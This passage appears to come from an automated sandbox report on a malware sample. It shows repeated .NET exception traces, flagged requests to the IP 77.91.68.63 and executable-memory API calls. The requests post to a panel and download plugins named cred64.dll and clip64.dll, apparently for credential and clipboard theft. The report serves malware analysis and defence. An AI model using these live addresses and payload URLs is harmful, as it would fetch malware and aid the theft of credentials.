RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xa6cae53
registers.esp: 33745356
registers.edi: 33745748
registers.eax: 0
registers.ebp: 33745364
registers.edx: 0
registers.ebx: 33748356
registers.esi: 39708068
registers.ecx: 43313952
1 0 0

__exception__

 stacktrace: 
0xa6cae10
0xa6cb91e
0xa6cb1d9
0xa6c64fd
0xa6c5084
0xa6c3f31
0x227d9ff
0x2277c1d
0x22772d3
0x2273c6b
0x22735d9
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72592652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725a264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725a2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726574ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72657610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x726e1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x726e1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x726e1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x726e416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73f4f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fc7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fc4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xa6cae53
registers.esp: 33745356
registers.edi: 33745748
registers.eax: 0
registers.ebp: 33745364
registers.edx: 0
registers.ebx: 33748356
registers.esi: 39708068
registers.ecx: 44841096
1 0 0

__exception__

 stacktrace: 
0xa6cae10
0xa6cc24a
0xa6cbbf1
0xa6c64e5
0xa6c519c
0xa6c3f31
0x227d9ff
0x2277c1d
0x22772d3
0x2273c6b
0x22735d9
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72592652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725a264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725a2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726574ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72657610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x726e1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x726e1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x726e1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x726e416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73f4f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fc7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fc4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xa6cae53
registers.esp: 33745408
registers.edi: 33745748
registers.eax: 0
registers.ebp: 33745416
registers.edx: 0
registers.ebx: 33748356
registers.esi: 39708068
registers.ecx: 39712564
1 0 0

__exception__

 stacktrace: 
0xa6cae10
0xa6cc24a
0xa6cbbf1
0xa6c64fd
0xa6c519c
0xa6c3f31
0x227d9ff
0x2277c1d
0x22772d3
0x2273c6b
0x22735d9
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72592652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725a264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725a2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726574ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72657610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x726e1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x726e1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x726e1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x726e416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73f4f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fc7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fc4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xa6cae53
registers.esp: 33745408
registers.edi: 33745748
registers.eax: 0
registers.ebp: 33745416
registers.edx: 0
registers.ebx: 33748356
registers.esi: 39697008
registers.ecx: 41119472
1 0 0

__exception__

 stacktrace: 
0xa6cae10
0xa6cc24a
0xa6cbbf1
0xa6c64fd
0xa6c519c
0xa6c3f31
0x227d9ff
0x2277c1d
0x22772d3
0x2273c6b
0x22735d9
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72592652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725a264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725a2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726574ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72657610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x726e1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x726e1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x726e1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x726e416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73f4f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fc7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fc4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xa6cae53
registers.esp: 33745408
registers.edi: 33745748
registers.eax: 0
registers.ebp: 33745416
registers.edx: 0
registers.ebx: 33748356
registers.esi: 39697008
registers.ecx: 42513120
1 0 0

__exception__

 stacktrace: 
0xa6cae10
0xa6cc95c
0xa6cc3b9
0xa6c64e5
0xa6c52a2
0xa6c3f31
0x227d9ff
0x2277c1d
0x22772d3
0x2273c6b
0x22735d9
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72592652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725a264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725a2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726574ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72657610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x726e1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x726e1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x726e1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x726e416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73f4f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fc7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fc4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xa6cae53
registers.esp: 33745440
registers.edi: 33745748
registers.eax: 0
registers.ebp: 33745448
registers.edx: 0
registers.ebx: 33748356
registers.esi: 39697008
registers.ecx: 43906904
1 0 0

__exception__

 stacktrace: 
0xa6cae10
0xa6cc95c
0xa6cc3b9
0xa6c64fd
0xa6c52a2
0xa6c3f31
0x227d9ff
0x2277c1d
0x22772d3
0x2273c6b
0x22735d9
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72592652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725a264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725a2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726574ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72657610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x726e1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x726e1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x726e1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x726e416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73f4f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fc7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fc4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xa6cae53
registers.esp: 33745440
registers.edi: 33745748
registers.eax: 0
registers.ebp: 33745448
registers.edx: 0
registers.ebx: 33748356
registers.esi: 39697008
registers.ecx: 40696608
1 0 0

__exception__

 stacktrace: 
0xa6cae10
0xa6cc95c
0xa6cc3b9
0xa6c64fd
0xa6c52a2
0xa6c3f31
0x227d9ff
0x2277c1d
0x22772d3
0x2273c6b
0x22735d9
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72592652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725a264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725a2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726574ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72657610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x726e1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x726e1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x726e1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x726e416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73f4f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fc7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fc4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xa6cae53
registers.esp: 33745440
registers.edi: 33745748
registers.eax: 0
registers.ebp: 33745448
registers.edx: 0
registers.ebx: 33748356
registers.esi: 39697008
registers.ecx: 42092880
1 0 0

__exception__

 stacktrace: 
0xa6cae10
0xa6cdce3
0xa6cd28e
0xa6c3f89
0x227d9ff
0x2277c1d
0x22772d3
0x2273c6b
0x22735d9
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72592652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725a264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725a2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726574ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72657610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x726e1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x726e1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x726e1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x726e416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73f4f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fc7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fc4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xa6cae53
registers.esp: 33746260
registers.edi: 33746524
registers.eax: 0
registers.ebp: 33746268
registers.edx: 0
registers.ebx: 33748356
registers.esi: 42661788
registers.ecx: 42668764
1 0 0
suspicious_features POST method with no referer header, POST method with no useragent header, Connection to IP address suspicious_request POST http://77.91.68.63/doma/net/index.php
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://77.91.68.63/doma/net/Plugins/cred64.dll
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://77.91.68.63/doma/net/Plugins/clip64.dll
request POST http://77.91.68.63/doma/net/index.php
request GET http://77.91.68.63/doma/net/Plugins/cred64.dll
request GET http://77.91.68.63/doma/net/Plugins/clip64.dll
request POST http://77.91.68.63/doma/net/index.php
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

 process_identifier: 1708
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x74011000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1708
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73fe1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2116
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x74011000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2116
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73fb1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x74011000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73fe1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2252
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73fb2000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2252
region_size: 655360
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x005d0000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2252
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00630000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2252
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73522000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2252
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73f2b000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2252
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72ee1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2252
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72ee2000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2252
region_size: 1114112
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00c20000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2252
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00cf0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2252
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00452000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2252
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0046c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2252
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73e5a000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2252
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00ab0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2252
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00ab1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2252
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00ab2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2252
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00ab3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2252
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00485000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2252
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0048b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2252
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00487000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2252
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73dd1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2252
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73c81000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2252
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6eeee000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2252
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6ed6b000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2252
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0045a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2252
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00ab4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2252
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00ab5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2252
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73c6f000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2252
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0045c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2252
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00ab6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2252
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00476000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2252
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0047a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2252
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00477000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2252
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0047b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2252
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0046a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2252
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0047c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2252
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0046d000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2252
region_size: 327680
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef50000
allocation_type: 1056768 (MEM_RESERVE|MEM_TOP_DOWN)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2252
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef50000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2252
